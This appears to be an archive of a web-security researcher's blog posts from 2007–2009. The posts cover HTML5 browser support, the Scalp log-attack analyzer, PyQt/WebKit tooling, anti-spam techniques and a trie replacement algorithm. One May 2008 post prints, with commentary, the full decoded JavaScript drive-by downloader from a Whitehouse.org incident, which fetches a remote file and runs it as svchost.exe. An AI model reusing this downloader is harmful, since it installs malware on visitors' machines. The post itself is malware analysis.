Friday, March 13 2009

HTML 5 current browsers implementation support

Firefox 3.1beta has been released today, with support for two HTML 5 elements: audio and video.

Gareth and I exchanged some messages on twitter+ about the current support of HTML 5 by the different engines. The first document I found (well, asking on the #whatwg IRC chan) is the Comparison of layout engines you can find on Wikipedia; they also pointed me to a wiki that WhatWG maintains: Implementations in Web browsers.

These documents are pretty incomplete, so I decided to create a mapping between the current WhatWG document and the support in the browsers. This is possible because the current document reports the implementation status of the different items.

Anyway, here is a table I assembled, containing the latest information about the HTML5 implementations in the current browser engines.

I also want to say that even if the WASC Script Mapping project has looked quite inactive for some time now, I will definitely continue it. I'm actually waiting to finish a couple of other projects I participate in, especially the WASC Threat Classification 2 and the Web Application Security Scanner Evaluation Criteria. I expect to get started again on Script Mapping during this summer...

EDIT: I will maintain the current list of HTML5 implementation in current browsers: HTML5. March 30.

+ twitter is quite cool to follow/interact, feel free to follow me at @rgaucher

Tuesday, January 13 2009

CIA spamming security groups: Be a part of a mission that’s larger than all of us.

Hello Romain,

The Central Intelligence Agency would like you to consider a career with the National Clandestine Service. The CIA’s National Clandestine Service seeks qualified applicants to serve our country’s mission abroad. Our careers offer rewarding, fast-paced, and high impact challenges in intelligence collection on issues of critical importance to US national security. Applicants should possess a high degree of personal integrity, strong interpersonal skills, and good written and oral communication skills. We welcome applicants from various academic and professional backgrounds. Do you want to make a difference for your country? Are you ready for a challenge?

All applicants for National Clandestine Service positions must successfully undergo several personal interviews, medical and psychological exams, aptitude testing, a polygraph interview, and a background investigation. Following entry on duty, candidates will undergo extensive training. US citizenship required. An equal opportunity employer and a drug-free work force.

For more information and to apply, visit: www.cia.gov

You can make a world of difference.

Come on guys, I'm not even a US citizen... So yeah, the CIA is looking for security guys by spamming LinkedIn groups. Anything wrong with that process?

Tuesday, September 16 2008

Scalp 0.4: apache log based attack analyzer, updated

Some time ago, I released a first version of a tool named Scalp. The tool analyzes Apache HTTPD logs to determine whether they contain attacks. The attack detection is based on the rules provided by the PHP-IDS project.

Today, I took the time to finalize the Python version of Scalp a bit more. Version 0.4 can now be downloaded from the project web page.

This version includes a couple of features such as:

  • Output in HTML, XML or TEXT format
  • Specify the output directory
  • Using a random sample for scanning the log file
  • Trying to decode the potential attack vectors
  • Returning the lines that couldn't be examined

And then, with some other options that already existed in the previous versions,

  • Select a time frame
  • Select classes of potential attacks

the tool seems to approach a final version.
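
As a rough illustration of the rule-based detection and of the decoding option listed above, here is a minimal Python sketch. It is not Scalp's code: the two regular expressions are simplified stand-ins for PHP-IDS rules, and the names RULES, REQUEST, decode and scan are made up for this example.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical, heavily simplified rules; the real PHP-IDS filter set is much larger.
RULES = {
    "xss": re.compile(r"<\s*script", re.IGNORECASE),
    "sqli": re.compile(r"union\s+select", re.IGNORECASE),
}

# Request part of an Apache access log line: "METHOD URL PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(url, rounds=3):
    """URL-decode repeatedly to undo nested encodings of an attack vector."""
    for _ in range(rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url

def scan(lines):
    """Return (hits, skipped): matched (rule, line) pairs and lines that could not be examined."""
    hits, skipped = [], []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            skipped.append(line)
            continue
        url = decode(match.group(1))
        hits.extend((name, line) for name, rule in RULES.items() if rule.search(url))
    return hits, skipped
```

Scanning a random sample instead of the whole file could then be as simple as passing random.sample(lines, k) to scan().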

I won't add more to it since I want to keep it simple and quite fast (I may add optimizations if I find some). Also, the C++ version is on its way and mostly done, with the same set of options; the code can be checked out from the Google repository, but I still have to work on the options and the time-frame specification.

Scalp 0.4:

Wednesday, September 10 2008

PyQt and WebKit integration: unexpected limitation [fixed]

For those who don't know Qt, it is a huge and mature framework for developing GUIs and more on different platforms (read: multi-platform). I have already done some development using Qt and C++ (especially when I was working at the GERAD).

Since Marcin and I wanted to have a look at some technologies that involve a browser, I decided to look at Qt and its almost-fresh WebKit integration.

The integration of WebKit in a framework like Qt allows developers to embed in their application, supposedly in an easy manner, a browser that supports the basic web technologies: HTML, CSS and JavaScript (it seems that Flash is going to be supported soon, and anyway, one can write one's own plugin in order to interact with some specific content).

And indeed it is easy... I used PyQt to develop a very simple prototype and see what we are able to do with this new technology. As I already know Python and Qt, it was easy for me to start and be kinda effective. So, after a few hours of work, reading documentation and trying to understand why and how the Python version of Qt does some things differently from the C++ version, I got a workable browser that allows dynamic JavaScript injection through a console, viewing the source, and a simple encoding converter.



At this point, I was actually very excited: less than 500 lines of Python to create that... it was kinda worth a few days of work in order to create a useful tool: the Swiss Army Knife of the Pen-Test.

My next logical step was to extend the current tool in order to have tamper-data-like capabilities (e.g. being able to intercept the HTTP request and then tamper with the GET/POST data).

And here come the problems... it's apparently not possible to get hold of the current request and then the reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to overload the POST/GET requests, since this object is used to set the proxies etc., but nothing... I think they just didn't open up this possibility for some reason.

Oh well, I then stopped developing this prototype and will try to contact Qt experts/developers just to figure out whether there is another way to do it. I thought of a solution, which would be to have my own HTTP manager using QHttp to do the request, get the response etc. and then send the content to the browser; this would be great in a webapp scanner, but for the use I had in mind, it would create huge limitations for user interaction and especially for Ajax applications. So, the prototype stays as it is until I find a solution or Qt opens up the network management under the QWebView widget...


Fixed:

An update to let you know that I actually fixed the problem. It was really stupid of me: I should really check whether a method is virtual or not before overloading it :/ shame on me!

So now, I am able to have a firefox/tamper-data/firebug in one tool :)

Wednesday, August 13 2008

And so you wanted to protect your email address on your website...

People start thinking about how to prevent spam when they're building a website; that's a fact, and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page...

For instance, I was surfing on qik.com and saw this little piece of JavaScript in order to protect the exposure of the email address:

<script type="text/javascript">
//<![CDATA[
  document.write('<a href="mailto:XXXX@qik.com"\
    title="Send us an email!">XXXX@qik.com<\/a>');
//]]>
</script>

As the readers of this blog may know, the bot process is really simple... download the HTML page (crawling) and then try to extract the email addresses (parsing). It is obvious that a bot wouldn't be bothered by the CDATA section or by the fact that the address is embedded in JavaScript code. If I had to write a bot, I would use a very loose parsing in order to gather as much information as possible, and I wouldn't care about "which context am I in?". Also, according to some testing I'm doing, I can tell you that if this were a URL, the Google bots would get it...
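
To make the point concrete, here is a minimal Python sketch of such a context-blind harvester. The regular expression and the harvest name are illustrative assumptions, not the code of any real bot; the page is the snippet quoted above.

```python
import re

# Deliberately loose pattern: it ignores HTML, JavaScript and CDATA context entirely.
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def harvest(html):
    """Return the unique email addresses found anywhere in the raw page text."""
    return sorted(set(EMAIL.findall(html)))

page = r'''<script type="text/javascript">
//<![CDATA[
  document.write('<a href="mailto:XXXX@qik.com"\
    title="Send us an email!">XXXX@qik.com<\/a>');
//]]>
</script>'''

print(harvest(page))  # prints ['XXXX@qik.com']
```

The document.write() wrapper changes nothing for this kind of parser, since the address still appears verbatim in the downloaded bytes.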

So please, obfuscate this just a bit... some examples can be found on fuckthespam.com

Monday, July 28 2008

Trie based fast and massive replacement (Algorithm)

While working on the C++ version of scalp, I had to do massive simple transformations of a given text, i.e. replacements of words by others.

Since the main way to do this (a loop which does one replacement at a time) is very inefficient, I decided to find something faster. I then came up with a tree-based replacement algorithm; I believe this is kinda famous, but I had never heard about such an algorithm. It basically uses a non-compact trie in order to have an efficient search of the current word.

The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to replace the words "ba", "me" and "mp" in a text, the trie has a root with two children, b and m; b has the single child a, and m has the two children e and p.

The idea is then to iterate over all the characters in the text and, for each letter, determine whether it may start a word to replace (simply by looking whether the letter is a child of the trie root). Then, we iterate over the next letters in the text in order to see whether the sequence of letters is an actual word to replace (every time, the same methodology is used: look in the children of the current state of our iterator in the trie).

This algorithm seems more efficient than the simple replace used in a loop, since we perform a descent in a tree and therefore replace a linear search over the dictionary by a logarithmic one.
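
The descent described above can be sketched in a few lines of Python. This is not the stree.h implementation: the nested-dict trie, the function names and the choice of always taking the longest match (without rescanning replaced text) are assumptions made for the illustration.

```python
def build_trie(replacements):
    """Build a non-compact trie: one dict node per character."""
    root = {}
    for word, substitute in replacements.items():
        node = root
        for char in word:
            node = node.setdefault(char, {})
        node[None] = substitute  # the None key marks the end of a word
    return root

def trie_replace(text, replacements):
    """Replace every dictionary word in a single left-to-right pass over text."""
    root = build_trie(replacements)
    out, i = [], 0
    while i < len(text):
        node, j, found = root, i, None
        # descend while the next character is a child of the current node
        while j < len(text) and text[j] in node:
            node = node[text[j]]
            j += 1
            if None in node:
                found = (j, node[None])  # remember the longest match so far
        if found:
            end, substitute = found
            out.append(substitute)
            i = end
        else:
            out.append(text[i])
            i += 1
    return "".join(out)

print(trie_replace("bamboo meme lamp", {"ba": "BA", "me": "ME", "mp": "MP"}))
# prints: BAmboo MEME laMP
```

Note one behavioural difference with a loop of plain replaces: here the output of one replacement is never scanned again by another one.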


I ran a little statistical comparison between two algorithms: mine and the simple loop one. The test bed is quite simple and uses randomly generated text which contains the words to replace with a certain density. In order to create statistics, I made all the sizes vary and I aggregated the results for the same dictionary size. So, for a given dictionary size (let's say, 200 words to replace), texts have been generated with a density that varies from 0.1 to 0.5 (from 10% to 50% of the words in the text are words to replace) and, finally, a text size that varies from 25 to 200 words (the words are randomly generated with a length from 5 to 32).
As I said previously, the results for a same dictionary size have been aggregated since I've seen in practice that the result mainly depends on the dictionary size (it also obviously depends on the size of the text, but as this is the same for the 2 algorithms, I can compute the mean of the different data to extract the average gain for a particular dictionary size).

Finally, here is the curve that shows the logarithmic progression of the gain compared to the classical method:

The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation):

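#include <string>
using std::string;

// Replace every occurrence of `what` in `where` by `by`, in place.
void str_replace(string& where, const string& what, const string& by) {
  if (what.empty()) return;  // find("") always matches and would loop forever
  for (string::size_type i  = where.find(what);
                                 i != string::npos;
                                 i  = where.find(what, i + by.size()))
    where.replace(i, what.size(), by);
}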
and has been used M times (M is the size of the dictionary).
I also decided to release a very early version of this replace algorithm (which is not templated yet): stree.h, which uses the great STL-friendly tree structure from Kasper Peeters.

For reference, here is the code I used to generate the dictionary and the text with a certain density: genRandData.cpp

Tuesday, May 20 2008

ph34r the script kiddies: Whitehouse.org

I was just reading this news (reported by Kanedaa) and decided to look closer at the content of this "malware" stuff to see if there were some nice techniques behind this so-called "attack".

Oh man! How disappointing to see that this was done by script kiddies... the "obfuscation" consists of 3 levels of URL-encoded JavaScript... yeah... URL encoding is for sure an obfuscation that is very hard to prettify. And the final code was not even obfuscated... Just this:

function myCreateOB(o, n) {
    var r = null;
    try { eval('r = o.CreateObject(n)') }catch(e){}
    if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} }
    if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject(n)') }catch(e){}  }
    return(r);
}

function Go(a) {
    var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
    var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
    var e = s.Environment("Process");
    var xml = null;
     var url = 'http://ad.ox88.info/bbs.jpg';
    var bin = e.Item("TEMP") + "svchost.exe";
    var dat;
    try { xml=new XMLHttpRequest(); }
    catch(e) {
        try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); }
        catch(e) {
            xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
        }
    }
    if (! xml) return(0);
    xml.open("GET", url, false)
    xml.send(null);
    dat = xml.responseBody;

    o.Type = 1;
    o.Mode = 3;
    o.Open();
    o.Write(dat);
    o.SaveToFile(bin, 2);

    s.Run(bin,0);
}

function mywoewd() {
    var i = 0;
    var ss11='{7F5B7F';
    var ss12='63-F06';
    var ss13='F-4331-8A';
    var ss14='26-339E0'
    var ss15='3C0AE3D}';
    var ss1=ss11+ss12+ss13+ss14+ss15
    var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
    var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}";
    var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}";
    var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";

    var t = new Array(ss1,ss2,ss3,ss4,ss5,null);
    while (t[i]) {
        var a = null;
        if (t[i].substring(0,1) == '{') {
         a = document.createElement("object");
         a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
        } else {
            try { a = new ActiveXObject(t[i]); } catch(e){}
        }
        if (a) {
            try {
                var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell");
                if (b) {
                    Go(a);
                    return(0);
                }
            } catch(e){}
        }
        i++;
    }
}

As reported by Trend Micro, this is supposed to be a download of the trojan: TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't detect it :)
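
For the record, peeling off stacked URL encoding like the 3 levels mentioned above takes only a few lines. The sketch below is a Python illustration with a harmless stand-in payload (the real script is not reproduced here); the function name peel and its max_rounds parameter are made up for the example.

```python
from urllib.parse import quote, unquote

def peel(text, max_rounds=10):
    """Undo nested URL encoding; return (decoded_text, number_of_layers)."""
    layers = 0
    while layers < max_rounds:
        decoded = unquote(text)
        if decoded == text:  # nothing left to decode
            break
        text, layers = decoded, layers + 1
    return text, layers

# Harmless stand-in, wrapped in three layers of URL encoding.
payload = "function Go(a) { return a; }"
wrapped = quote(quote(quote(payload, safe=""), safe=""), safe="")

print(peel(wrapped))  # prints ('function Go(a) { return a; }', 3)
```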

Thursday, May 1 2008

Accelerate the convergence to the bug: Running the test in 16-bit

Yesterday, I came across a case in a piece of software which was really hard for me to understand perfectly. Not only is the code well written (which is always worse for finding bugs :)) but the structure is also well thought out (this is the implementation of an associative array in C in the lighttpd application).

The problem I had was to state whether a tool report was a true positive or a false positive. As in many cases I've seen in this software, a problem may occur only in the limit cases. This one may occur after INT_MAX insertions in the structure. I don't know if any of you ever tried to do such a thing, but INT_MAX (~2 billion on a typical PC) allocations alone is a lot, so inserting that many elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. Also, I ran this test with valgrind using the memory leak check (full check and high definition).

I then ran a simple test program to fill this structure in real conditions: a typical x86/32-bit architecture. As I knew it was stupid and didn't think this could end within 2 days, I started looking in another direction in order to reduce the INT_MAX size and get a reasonable execution time for the test.

My first attempt was to shift all the types that are used. I knew this was not perfect because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers: a char * would still be 32-bit (there may be some options in gcc to control the size of the pointers, which I doubt, but I didn't find any). Using this methodology, I was able to make the program crash in a way that would have been a real true positive.

But I knew it was not good since the size of the pointers is not modified, and I had the feeling that in that particular structure, the case of the possible crash is handled by itself (due to pointer and type limits). So I started looking in another direction for running that program in 16-bit, a pseudo-real-16-bit mode. I looked into emulators and how to compile code for 16-bit and run it on my Linux (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with the ELKS utilities, the test program didn't crash; it only failed an assertion after an allocation...

Different behavior with different methods, okay... which is the correct one? Is it a problem of pointer size that made the test run differently from the real program on 32-bit, or maybe a limitation of the elksemu machine? This morning I checked the state of the 32-bit run I launched yesterday, and it had finished... ended by a failed assertion.

As expected, pointer size matters when you wanna test the intrinsic limitations of a structure and its behavior using limit cases.
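
To give an idea of why narrowing the integer type makes the limit case reachable in seconds, here is a small Python sketch of a size counter that wraps around. It is only an illustration: the growth step of 16 and the function name are assumptions, not lighttpd's code, and the sketch says nothing about pointer size, which is precisely what the type-shifting trick fails to reproduce.

```python
def growths_until_wrap(bits, step=16):
    """Count how many fixed-size growths a `bits`-wide unsigned size counter survives."""
    mask = (1 << bits) - 1
    size, growths = 0, 0
    while True:
        new_size = (size + step) & mask  # unsigned arithmetic wraps silently
        growths += 1
        if new_size < size:              # the counter wrapped around
            return growths
        size = new_size

print(growths_until_wrap(16))  # prints 4096
```

With a 32-bit counter and the same step, the loop would need 2**32 / 16 iterations before wrapping, which is why the full-size run takes so long.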

Monday, March 17 2008

Untrusted websites passwords

After using different passwords for a while, it's really bothersome to have so much diversity; you need to remember them or, well, store them in a password.txt

I just made a simple script for myself in order to generate, from mostly the same password, different ones for different websites... This is no big deal, just a simple script, but I thought it could be useful for some of you...

You can reach the script here: Untrusted websites passwords creator
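
The linked script is not reproduced here, so the following Python sketch only shows one possible way to derive per-site passwords from a single master password. The use of HMAC-SHA256, the function name site_password and the default length are assumptions of this example, not a description of the original script.

```python
import base64
import hashlib
import hmac

def site_password(master, site, length=16):
    """Derive a per-site password from one master password (HMAC-SHA256)."""
    digest = hmac.new(master.encode("utf-8"),
                      site.lower().encode("utf-8"),
                      hashlib.sha256).digest()
    # URL-safe base64 keeps the result printable
    return base64.urlsafe_b64encode(digest).decode("ascii")[:length]

print(site_password("my master password", "example.com"))
print(site_password("my master password", "example.org"))
```

The same master password and site name always give the same result, so nothing needs to be stored in a password.txt.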

Wednesday, January 30 2008

Definition parsing: first step done

Since I started to work on my static analyzer using php-ast/oracle, I realized that looking for vulnerabilities needs a lot of hard-coded/database entries. This is really sad since, in order to get something correct, you would need a huge knowledge database. So I started thinking about a generalization of vulnerabilities and a way to express it. It's tough. Really.

The most realistic (if I can say so) idea I had is to handle vulnerability definitions using a given taxonomy. I still need a lot of knowledge, especially about the language (PHP) I'm analyzing: the output functions, global variables, filters, resources etc. But the big advantage with rules is that you can generalize the definition.

Anyway, I started dealing with natural language and will try to make it fit into my model in order to communicate with the future static analyzer engine of php-oracle... and thanks to the AIMA project, I was able to get some fast results on the processing:

# source definition:
unvalidated input go to sink in html context
# parse tree:
2 possiblities
##
  02NP[('Adjective', 'unvalidated'), ('Noun', 'input')][]
      23VP[('Verb', 'go')][]
        45NP[('Noun', 'sink')][]
       ('Preposition', 'to')
      35PP[]
     
    25VP[]
      68NP[('Name', 'html'), ('Noun', 'context')][]
     ('Preposition', 'in')
    58PP[]
   
  28VP[]

08S[]
##
  02NP[('Adjective', 'unvalidated'), ('Noun', 'input')][]
    23VP[('Verb', 'go')][]
        45NP[('Noun', 'sink')][]
          68NP[('Name', 'html'), ('Noun', 'context')][]
         ('Preposition', 'in')
        58PP[]
       
      48NP[]
     ('Preposition', 'to')
    38PP[]
   
  28VP[]
 
08S[]

And the taxonomy I used is the following (which needs to be extended to handle more than "input validation"):

IV = Grammar('InputValidation',
	Rules(
		S = 'NP VP | S Conjunction S',
		NP = 'Pronoun | Noun | Article Noun | Adjective Noun | NP PP | NP RelClause | Name Noun',
		VP = 'Verb | VP NP | VP Adjective | VP PP',
		PP = 'Preposition NP',
		RelClause = 'That VP'
	),
	Lexicon(
		Noun = "input | output | privilege | context | header | user | sink | file",
		Verb = "is | go | write | print",
		Adjective = "validated | unvalidated | asynchronous",
		Pronoun = "me | you | i | it",
		Name = "html | database | http | sql | ldap",
		Article = "the | a | an",
		Preposition = "to | in | on",
		Conjunction = "and | or | but | not",
		That = "that"
	))
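
As a cross-check of the "2 possibilities" reported above, here is a small self-contained Python sketch that counts the parse trees of a sentence under the same rules and lexicon. It does not use the AIMA code: the span-based counting and the names RULES, LEXICON and count_parses are assumptions of this example.

```python
from functools import lru_cache

# Same rules and lexicon as the grammar above, in the same "a | b" notation.
RULES = {name: [tuple(alt.split()) for alt in rhs.split(" | ")] for name, rhs in {
    "S": "NP VP | S Conjunction S",
    "NP": "Pronoun | Noun | Article Noun | Adjective Noun | NP PP | NP RelClause | Name Noun",
    "VP": "Verb | VP NP | VP Adjective | VP PP",
    "PP": "Preposition NP",
    "RelClause": "That VP",
}.items()}

LEXICON = {name: set(words.split(" | ")) for name, words in {
    "Noun": "input | output | privilege | context | header | user | sink | file",
    "Verb": "is | go | write | print",
    "Adjective": "validated | unvalidated | asynchronous",
    "Pronoun": "me | you | i | it",
    "Name": "html | database | http | sql | ldap",
    "Article": "the | a | an",
    "Preposition": "to | in | on",
    "Conjunction": "and | or | but | not",
    "That": "that",
}.items()}

def count_parses(sentence, start="S"):
    """Count the distinct parse trees of `sentence` rooted at `start`."""
    words = tuple(sentence.lower().split())

    @lru_cache(maxsize=None)
    def sym(symbol, i, j):
        # number of ways `symbol` can derive exactly words[i:j]
        if symbol in LEXICON:
            return int(j - i == 1 and words[i] in LEXICON[symbol])
        return sum(seq(rhs, i, j) for rhs in RULES[symbol])

    @lru_cache(maxsize=None)
    def seq(symbols, i, j):
        # number of ways a sequence of symbols can derive exactly words[i:j]
        if len(symbols) == 1:
            return sym(symbols[0], i, j)
        # the first symbol covers words[i:k]; every remaining symbol needs one word or more
        return sum(sym(symbols[0], i, k) * seq(symbols[1:], k, j)
                   for k in range(i + 1, j - len(symbols) + 2))

    return sym(start, 0, len(words))

print(count_parses("unvalidated input go to sink in html context"))  # prints 2
```

The two trees differ only in where "in html context" attaches: to the verb phrase or to "sink".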

Now, I only have to finish my model of a vulnerability (I am not thinking about building something really general, but a model that can handle injection flaws, privilege and communication would be awesome). Once this is finished, lots of things would be possible, such as generating attacks directly from the definition (this would be more like a generalized attack generator) and vulnerability checkers for the source code analyzer.

I know this is a kinda tough project and I really have lots of other things to do, but I really want to give this a try... just to see where it goes...

Tuesday, January 29 2008

Search engine keywords extraction

For fuckthespam!, I wanted to add a nice feature related to the content of this website: a listing of the keywords that people used to reach this website.

Well, the code is pretty simple but I just wanted to share it; it works for google, msn and yahoo (the 3 most important search engines). I don't really care about covering everything and just wanted to share this PHP snippet.

$referer = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "";
if (strpos($referer, "search") !== false) {
	// look for google, yahoo and MSN
	$key = null;
	if (strpos($referer, "google.") !== false || strpos($referer, "msn.") !== false)
		$key = "q";
	else if (strpos($referer, "yahoo.") !== false)
		$key = "p";

	if ($key) {
		// parse first and decode afterwards: decoding the whole URL up front
		// would turn an encoded "&" inside the search terms into a separator
		$query = parse_url($referer, PHP_URL_QUERY);
		if ($query) {
			parse_str($query, $params); // parse_str() also URL-decodes the values
			if (isset($params[$key]) && is_string($params[$key])) {
				$keyword = $params[$key];
				if (strlen($keyword) > 2) {
					// $keyword is actually the whole content of the search
				}
			}
		}
	}
}

Friday, January 25 2008

Protection against spam bot | fuckthespam.com

I used to work a bit on spam bot protection, whether for protecting against email disclosure or against spam on the website itself. I then started a stupid website called http://fuckthespam.com where I will gather some spam (the funny kind) and also list some anti-spam techniques :)

Hopefully I will also be able to write a history of spam to see how the techniques and the content evolved.

Wednesday, October 17 2007

IE6 And IE7 don't have compatible CSS tricks

It's so sad. As a web developer (sometimes), I write CSS, and like almost all CSS developers I run into some trouble. A bad but fast solution I used to rely on is to duplicate a CSS statement for IE, like this one:

body {
  background-color: green; /*  Green for everybody */
  _background-color: red; /*  Overload to red for Internet Explorer */
}

But this trick is not working anymore with IE7; it doesn't understand the underscore... the solution? Add a dot!

body {
  background-color: green; /*  Green for everybody */
  _background-color: red; /*  Overload to red for Internet Explorer 6 */
  .background-color: blue; /*  Overload to blue for Internet Explorer 7 */
}

This is really sad! First of all, the old hack is well known and used... so, lots of CSS is actually not working like it should with IE7. Why the heck did they do that? Isn't Microsoft good at backward compatibility? Thought so....

Wednesday, May 30 2007

Back to work!

And I've just received this book this morning:

Wednesday, April 11 2007

Pretty good CAPTCHA: Against the current OCR

Today, something reminded me of a study from Cmabrigde (http://www.mrc-cbu.cam.ac.uk/~mattd/Cmabrigde/). The idea is that a human needs only a few letters of a word to be in order to understand that word (this does not hold for every word, but it should not be hard to find suitable ones).
So the idea is basically to create a captcha as an image with a word, but the word would be disordered in a way that a human can still read it, such as:

CNOTNENT
MANAEGR
KITHCEN
etc.


Okay, for a current OCR-based attack bot, this is breakable if you have a dictionary: use something like the Levenshtein distance and try to minimize the distance between the words in the dictionary and the word you found with your OCR.
But well, the captcha does not necessarily contain only one word...
The only problem I can see with this method is that the dictionary you use to generate the captcha should be in the language of the targeted humans. But well, for most websites, you know what readers/users you have...

If I have time I'd try to create a lib for this...
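
A minimal Python sketch of both sides of this idea could look like the following. Everything in it is an assumption made for illustration: the scrambler keeps the first and last letters in place, and the attack does not use the Levenshtein distance mentioned above but a simpler lookup on the sorted inner letters, which is enough when the OCR step reads the letters correctly.

```python
import random

def scramble(word, rng=random):
    """Shuffle the inner letters; keep the first and last ones in place."""
    if len(word) < 4:
        return word
    inner = list(word[1:-1])
    for _ in range(10):  # retry a few times to avoid returning the word unchanged
        rng.shuffle(inner)
        candidate = word[0] + "".join(inner) + word[-1]
        if candidate != word:
            return candidate
    return word

def signature(word):
    """First letter, sorted inner letters, last letter: unchanged by scramble()."""
    if not word:
        return ("", "", "")
    return (word[0], "".join(sorted(word[1:-1])), word[-1])

def unscramble(scrambled, dictionary):
    """Dictionary attack: return every word that has the same signature."""
    return [word for word in dictionary if signature(word) == signature(scrambled)]

words = ["CONTENT", "MANAGER", "KITCHEN"]
print(scramble("MANAGER"))
print(unscramble("MANAEGR", words))  # prints ['MANAGER']
```

This suggests that the scrambling alone adds little against a bot that owns the same dictionary; the difficulty stays in the OCR step.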

Friday, March 30 2007

Firebug: XHR prototype overloading failure

I love firebug; it is something really good for developing web apps. When I develop a small app, I usually do it under firefox only, with firebug and other nice extensions loaded.
But today I got a pretty annoying issue when I wanted to overload the XMLHttpRequest send function to do other things with it: Firebug simply does not allow me to do this, although it works well if I want to overload the 'open' function!

Pretty annoying, but you cannot do this with firebug activated:

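// keep a reference to the native implementation before overloading it
XMLHttpRequest.prototype.originalSend = XMLHttpRequest.prototype.send;
XMLHttpRequest.prototype.send = function(data) {
    var sData = transformation(data);
    this.originalSend(sData);
};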

Tuesday, March 27 2007

Obfuscation and Spam Bots: Update

Sven Vetsch/Disenchant has just sent me an email with a Vigenere version of the obfuscation script. This version is quite cute, but it's true that the public key is not secure enough... let's work on another version with a public and a private key!

You can find Disenchant's script here.

Obfuscation and Spam Bots

Still on the same subject, spam bots: I was thinking that obfuscation would be a good way to prevent spam bots. I first started playing with reversed strings; this may be obvious for the bots, but well, I'm pretty sure it's even more difficult than the previous technique, which can almost be bypassed by an intelligent-but-with-no-javascript-support parser.

So this version is quite simple:

<script>
String.prototype.reverse = function() { return this.split('').reverse().join(''); };
function reverseNames() {
	var elements = document.forms[0].elements;
	for (var i = 0; i < elements.length; i++) {
		elements[i].name = elements[i].name.reverse();
	}
	// no explicit submit() here: once the onsubmit handler returns, the submission goes on
}
</script>
...
<form method="post" action="check.php" onsubmit="reverseNames()">
	<label for="emanresu">&#8238;emanresu&#8237;</label> <input type="text" name="emanresu" />   <br />

You can find the running example: here.
Talking about obfuscation/crypto: since there are few parameters to obfuscate/encrypt, maybe a Vigenere algorithm would be nice...

Note that the string 'username' never appears in the HTML page; if you want to display 'username' you can use the character &#8238;, which reverses the text that follows it.
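
For readers who do not know the Vigenere cipher mentioned above, here is a minimal Python sketch applied to a field name. It is not Disenchant's script: the function name, the lowercase-only alphabet and the example key are assumptions made for the illustration.

```python
import string

ALPHABET = string.ascii_lowercase

def vigenere(text, key, decrypt=False):
    """Shift each lowercase letter of text by the matching key letter."""
    if not key or any(c not in ALPHABET for c in key):
        raise ValueError("key must be a non-empty string of lowercase letters")
    sign = -1 if decrypt else 1
    out, k = [], 0
    for char in text:
        if char in ALPHABET:
            shift = ALPHABET.index(key[k % len(key)])
            out.append(ALPHABET[(ALPHABET.index(char) + sign * shift) % 26])
            k += 1  # the key only advances on letters
        else:
            out.append(char)  # digits, '_' etc. are left untouched
    return "".join(out)

print(vigenere("username", "key"))                 # prints ewcbrywi
print(vigenere("ewcbrywi", "key", decrypt=True))   # prints username
```

The page would carry the encrypted field names and the server would decrypt them with the same key, which is why a key that is visible in the page offers little protection.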

Friday, March 23 2007

Prevent spam bots on a phpBB2

I already talked about techniques to prevent spam bots from registering or posting somewhere. Even though I think that a good solution for this is to create the SessionID with JavaScript, I was a little bit stuck with phpBB2: because of the template engine, I cannot easily write JavaScript dynamically in the page.

So, the solution I used is to simply create a CAPTCHA which is written in the page with JavaScript, such as:

document.write("<input type='hidden' name='persoCaptcha' value='" + generateStaticKeyWord() + "' />");

And then, I had to check for this value in the PHP script.

Fairly simple, but it seems to work without lots of modifications to the phpBB2 forum... Here is a list of spam bots that I detected with this technique on a forum. Even if this technique works for now, I will have to use a better one...

Wednesday, March 14 2007

.htaccess for protecting content from thieves

This really has nothing to do with web application security, but a friend asked me how to protect a bunch of html files in a directory. He was looking for session-based solutions, but for this he would have to rename the html files to php or whatever and then implement the protection... pretty boring!
I suggested a really easy and imperfect solution: checking the referer when accessing the html files (this is the same kind of protection as the anti-hotlinking one for images):

# .htaccess
# -------
RewriteEngine on
RewriteCond %{HTTP_REFERER} !yousite\.com/ [NC]
RewriteRule ^(.*)$ /fail.html [NC,L]

You can find an example here.

PS: this may not be a valid solution for lots of applications!

Wednesday, February 28 2007

Firefox2 and the Weird JavaScript Events...

For almost a week, I've been working with zeno, wisec and others on JavaScript events and HTML tags: which event can be executed in which tag...
The testing is definitely not finished, but I have been implementing a test bed based on JavaScript unit testing to save everybody from clicking on 8700 testcases * nb_browsers...

Anyway, the method I use is to fire a JavaScript event on the load of the document to verify whether it works (the information is gathered by the JSUnit framework).
So, the funny part in firefox is that I can fire almost every event on every tag; you can find an example here where I do something like this:

<acronym onsubmit="alert('TEST')">test</acronym>

